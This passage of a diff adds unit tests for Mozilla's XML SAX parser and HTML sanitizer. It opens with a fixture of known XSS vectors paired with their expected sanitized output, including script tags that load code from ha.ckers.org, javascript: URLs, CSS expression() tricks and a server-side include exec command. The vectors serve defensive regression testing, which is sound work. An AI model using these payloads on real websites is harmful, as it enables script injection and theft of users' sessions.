expression(alert('XSS'));\">", + "sanitized": "<html><head></head><body><div></div></body></html>" + }, + { + "data": "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<XSS STYLE=\"xss:expression(alert('XSS'))\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "exp/*<XSS STYLE='no\\xss:noxss(\"*//*\");", + "sanitized": "<html><head></head><body>exp/*</body></html>" + }, + { + "data": "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>", + "sanitized": "<html><head></head><body><a class=\"XSS\"></a></body></html>" + }, + { + "data": "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<BASE HREF=\"javascript:alert('XSS');//\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "getURL(\"javascript:alert('XSS')\")", + "sanitized": "<html><head></head><body>getURL(\"javascript:alert('XSS')\")</body></html>" + }, + { + "data": "a=\"get\";", + "sanitized": "<html><head></head><body>a=\"get\";</body></html>" + }, + { + "data": "<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:alert('XSS');\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<XML SRC=\"http://ha.ckers.org/xsstest.xml\" ID=I></XML>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<HTML><BODY>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'\"-->", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<? echo('<SCR)';", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-", + "sanitized": "<html><head> </head><body>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</body></html>" + }, + { + "data": "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC", + "sanitized": "<html><head></head><body>PT SRC</body></html>" + }, + { + "data": "", + "sanitized": "<html><head></head><body></body></html>" + } +] diff --git a/parser/xml/test/unit/test_namespace_support.js b/parser/xml/test/unit/test_namespace_support.js new file mode 100644 index 000000000..bcad61e91 --- /dev/null +++ b/parser/xml/test/unit/test_namespace_support.js @@ -0,0 +1,52 @@ +function noop() {} + +function run_test() { + var contentHandler = { + attrs: null, + reset: function() { + this.attrs = []; + }, + startDocument: noop, + endDocument: noop, + + startElement: function startElement(aNamespaceURI, aLocalName, aNodeName, aAttrs) { + for (var i = 0; i < aAttrs.length; i++) + this.attrs.push(aAttrs.getQName(i)); + }, + + endElement: noop, + characters: noop, + processingInstruction: noop, + ignorableWhitespace: noop, + startPrefixMapping: noop, + endPrefixMapping: noop + }; + + const nsISAXXMLReader = Components.interfaces.nsISAXXMLReader; + const src = "<a:x xmlns:a='foo' y='bar'/>"; + const NS_PREFIX = "http://xml.org/sax/features/namespace-prefixes"; + + var saxReader = Components.classes["@mozilla.org/saxparser/xmlreader;1"] + .createInstance(nsISAXXMLReader); + do_check_false(saxReader.getFeature(NS_PREFIX)); + saxReader.contentHandler = contentHandler; + contentHandler.reset(); + saxReader.parseFromString(src, "application/xml"); + do_check_eq(contentHandler.attrs.length, 1); + do_check_eq(contentHandler.attrs[0], "y"); + + saxReader.setFeature(NS_PREFIX, true); + do_check_true(saxReader.getFeature(NS_PREFIX)); + contentHandler.reset(); + saxReader.parseFromString(src, "application/xml"); + do_check_eq(contentHandler.attrs.length, 2); + do_check_eq(contentHandler.attrs[0], "xmlns:a"); + do_check_eq(contentHandler.attrs[1], "y"); + + saxReader.setFeature(NS_PREFIX, false); + do_check_false(saxReader.getFeature(NS_PREFIX)); + contentHandler.reset(); + saxReader.parseFromString(src, "application/xml"); + do_check_eq(contentHandler.attrs.length, 1); + do_check_eq(contentHandler.attrs[0], "y"); +} diff --git a/parser/xml/test/unit/test_parser.js b/parser/xml/test/unit/test_parser.js new file mode 100644 index 000000000..79c32bae4 --- /dev/null +++ b/parser/xml/test/unit/test_parser.js @@ -0,0 +1,167 @@ +function updateDocumentSourceMaps(source) { + const nsIDOMNode = Components.interfaces.nsIDOMNode; + + const nsISAXXMLReader = Components.interfaces.nsISAXXMLReader; + const saxReader = Components.classes["@mozilla.org/saxparser/xmlreader;1"] + .createInstance(nsISAXXMLReader); + try { + saxReader.setFeature("http://xml.org/sax/features/namespace-prefixes", true); + saxReader.setFeature("http://xml.org/sax/features/namespace", true); + } + catch (e) { + // do nothing, we'll accept it as it is. + } + var parseErrorLog = []; + + /* XXX ajvincent Because throwing an exception doesn't stop parsing, we need + * to record errors and handle them after the parsing is finished. + */ + function do_parse_check(aCondition, aMsg) { + if (!aCondition) + parseErrorLog[parseErrorLog.length] = aMsg; + } + + var contentHandler = { + startDocument: function startDocument() { + }, + + endDocument: function endDocument() { + }, + + handleAttributes: function handleAttributes(aAttributes) { + for (var i = 0; i < aAttributes.length; i++) { + var attrNamespaceURI = aAttributes.getURI(i); + var attrLocalName = aAttributes.getLocalName(i); + var attrNodeName = aAttributes.getQName(i); + var value = aAttributes.getValue(i); + do_parse_check(attrLocalName, "Missing attribute local name"); + do_parse_check(attrNodeName, "Missing attribute node name"); + } + }, + + startElement: function startElement(aNamespaceURI, aLocalName, aNodeName, aAttributes) { + do_parse_check(aLocalName, "Missing element local name (startElement)"); + do_parse_check(aNodeName, "Missing element node name (startElement)"); + do_parse_check(aAttributes, "Missing element attributes"); + this.handleAttributes(aAttributes); + }, + + endElement: function endElement(aNamespaceURI, aLocalName, aNodeName) { + do_parse_check(aLocalName, "Missing element local name (endElement)"); + do_parse_check(aNodeName, "Missing element node name (endElement)"); + }, + + inCDataSection: false, + + characters: function characters(aData) { + }, + + processingInstruction: function processingInstruction(aTarget, aData) { + do_parse_check(aTarget, "Missing processing instruction target"); + }, + + ignorableWhitespace: function ignorableWhitespace(aWhitespace) { + }, + + startPrefixMapping: function startPrefixMapping(aPrefix, aURI) { + }, + + endPrefixMapping: function endPrefixMapping(aPrefix) { + } + }; + + var lexicalHandler = { + comment: function comment(aContents) { + }, + + startDTD: function startDTD(aName, aPublicId, aSystemId) { + do_parse_check(aName, "Missing DTD name"); + }, + + endDTD: function endDTD() { + }, + + startCDATA: function startCDATA() { + }, + + endCDATA: function endCDATA() { + }, + + startEntity: function startEntity(aName) { + do_parse_check(aName, "Missing entity name (startEntity)"); + }, + + endEntity: function endEntity(aName) { + do_parse_check(aName, "Missing entity name (endEntity)"); + } + }; + + var dtdHandler = { + notationDecl: function notationDecl(aName, aPublicId, aSystemId) { + do_parse_check(aName, "Missing notation name"); + }, + + unparsedEntityDecl: + function unparsedEntityDecl(aName, aPublicId, aSystemId, aNotationName) { + do_parse_check(aName, "Missing entity name (unparsedEntityDecl)"); + } + }; + + var errorHandler = { + error: function error(aLocator, aError) { + do_parse_check(!aError, "XML error"); + }, + + fatalError: function fatalError(aLocator, aError) { + do_parse_check(!aError, "XML fatal error"); + }, + + ignorableWarning: function ignorableWarning(aLocator, aError) { + do_parse_check(!aError, "XML ignorable warning"); + } + }; + + saxReader.contentHandler = contentHandler; + saxReader.lexicalHandler = lexicalHandler; + saxReader.dtdHandler = dtdHandler; + saxReader.errorHandler = errorHandler; + + saxReader.parseFromString(source, "application/xml"); + + // Just in case it leaks. + saxReader.contentHandler = null; + saxReader.lexicalHandler = null; + saxReader.dtdHandler = null; + saxReader.errorHandler = null; + + return parseErrorLog; +} + +function do_check_true_with_dump(aCondition, aParseLog) { + if (!aCondition) { + dump(aParseLog.join("\n")); + } + do_check_true(aCondition); +} + +function run_test() { + var src; + src = "<!DOCTYPE foo>\n<!-- all your foo are belong to bar -->"; + src += "<foo id='foo'>\n<?foo wooly bully?>\nfoo"; + src += "<![CDATA[foo fighters]]></foo>\n"; + var parseErrorLog = updateDocumentSourceMaps(src); + + if (parseErrorLog.length > 0) { + dump(parseErrorLog.join("\n")); + } + do_check_true_with_dump(parseErrorLog.length == 0, parseErrorLog); + + // End tag isn't well-formed. + src = "<!DOCTYPE foo>\n<!-- all your foo are belong to bar -->"; + src += "<foo id='foo'>\n<?foo wooly bully?>\nfoo"; + src += "<![CDATA[foo fighters]]></foo\n"; + + parseErrorLog = updateDocumentSourceMaps(src); + + do_check_true_with_dump(parseErrorLog.length == 1 && parseErrorLog[0] == "XML fatal error", parseErrorLog); +} diff --git a/parser/xml/test/unit/test_sanitizer.js b/parser/xml/test/unit/test_sanitizer.js new file mode 100644 index 000000000..b8aaa1e08 --- /dev/null +++ b/parser/xml/test/unit/test_sanitizer.js @@ -0,0 +1,21 @@ +function run_test() { + var Ci = Components.interfaces; + var Cc = Components.classes; + + // vectors by the html5security project (https://code.google.com/p/html5security/ & Creative Commons 3.0 BY), see CC-BY-LICENSE for the full license + load("results.js"); // gives us a `vectors' array + + var ParserUtils = Cc["@mozilla.org/parserutils;1"].getService(Ci.nsIParserUtils); + var sanitizeFlags = ParserUtils.SanitizerCidEmbedsOnly|ParserUtils.SanitizerDropForms|ParserUtils.SanitizerDropNonCSSPresentation; + // flags according to + // http://mxr.mozilla.org/comm-central/source/mailnews/mime/src/mimemoz2.cpp#2218 + // and default settings + + + for (var item in vectors) { + var evil = vectors[item].data; + var sanitized = vectors[item].sanitized; + var out = ParserUtils.sanitize(evil, sanitizeFlags); + do_check_eq(sanitized, out); + } +} diff --git a/parser/xml/test/unit/test_xml_declaration.js b/parser/xml/test/unit/test_xml_declaration.js new file mode 100644 index 000000000..4cad511fb --- /dev/null +++ b/parser/xml/test/unit/test_xml_declaration.js @@ -0,0 +1,82 @@ +function noop() {} + +function run_test() { + var evts; + + var contentHandler = { + attrs: null, + startDocument: function() { + evts.push("startDocument"); + }, + endDocument: noop, + + startElement: function startElement() { + evts.push("startElement"); + }, + + endElement: noop, + characters: noop, + processingInstruction: noop, + ignorableWhitespace: noop, + startPrefixMapping: noop, + endPrefixMapping: noop + }; + + function XMLDeclHandler(version, encoding, standalone) { + evts.splice(evts.length, 0, version, encoding, standalone); + } + + const nsISAXXMLReader = Components.interfaces.nsISAXXMLReader; + var saxReader = Components.classes["@mozilla.org/saxparser/xmlreader;1"] + .createInstance(nsISAXXMLReader); + saxReader.contentHandler = contentHandler; + saxReader.declarationHandler = XMLDeclHandler; + + evts = []; + saxReader.parseFromString("<root/>", "application/xml"); + do_check_eq(evts.length, 2); + do_check_eq(evts[0], "startDocument"); + do_check_eq(evts[1], "startElement"); + + evts = []; + saxReader.parseFromString("<?xml version='1.0'?><root/>", "application/xml"); + do_check_eq(evts.length, 5); + do_check_eq(evts[0], "startDocument"); + do_check_eq(evts[1], "1.0"); + do_check_eq(evts[2], ""); + do_check_false(evts[3]); + do_check_eq(evts[4], "startElement"); + + evts = []; + saxReader.parseFromString("<?xml version='1.0' encoding='UTF-8'?><root/>", "application/xml"); + do_check_eq(evts.length, 5); + do_check_eq(evts[0], "startDocument"); + do_check_eq(evts[1], "1.0"); + do_check_eq(evts[2], "UTF-8"); + do_check_false(evts[3]); + do_check_eq(evts[4], "startElement"); + + evts = []; + saxReader.parseFromString("<?xml version='1.0' standalone='yes'?><root/>", "application/xml"); + do_check_eq(evts.length, 5); + do_check_eq(evts[0], "startDocument"); + do_check_eq(evts[1], "1.0"); + do_check_eq(evts[2], ""); + do_check_true(evts[3]); + do_check_eq(evts[4], "startElement"); + + evts = []; + saxReader.parseFromString("<?xml version='1.0' encoding='UTF-8' standalone='yes'?><root/>", "application/xml"); + do_check_eq(evts.length, 5); + do_check_eq(evts[0], "startDocument"); + do_check_eq(evts[1], "1.0"); + do_check_eq(evts[2], "UTF-8"); + do_check_true(evts[3]); + do_check_eq(evts[4], "startElement"); + + evts = []; + // Not well-formed + saxReader.parseFromString("<?xml encoding='UTF-8'?><root/>", "application/xml"); + do_check_eq(evts.length, 1); + do_check_eq(evts[0], "startDocument"); +} diff --git a/parser/xml/test/unit/xpcshell.ini b/parser/xml/test/unit/xpcshell.ini new file mode 100644 index 000000000..78bb604d2 --- /dev/null +++ b/parser/xml/test/unit/xpcshell.ini @@ -0,0 +1,9 @@ +[DEFAULT] +head = +tail = +support-files = results.js + +[test_parser.js] +[test_namespace_support.js] +[test_xml_declaration.js] +[test_sanitizer.js] |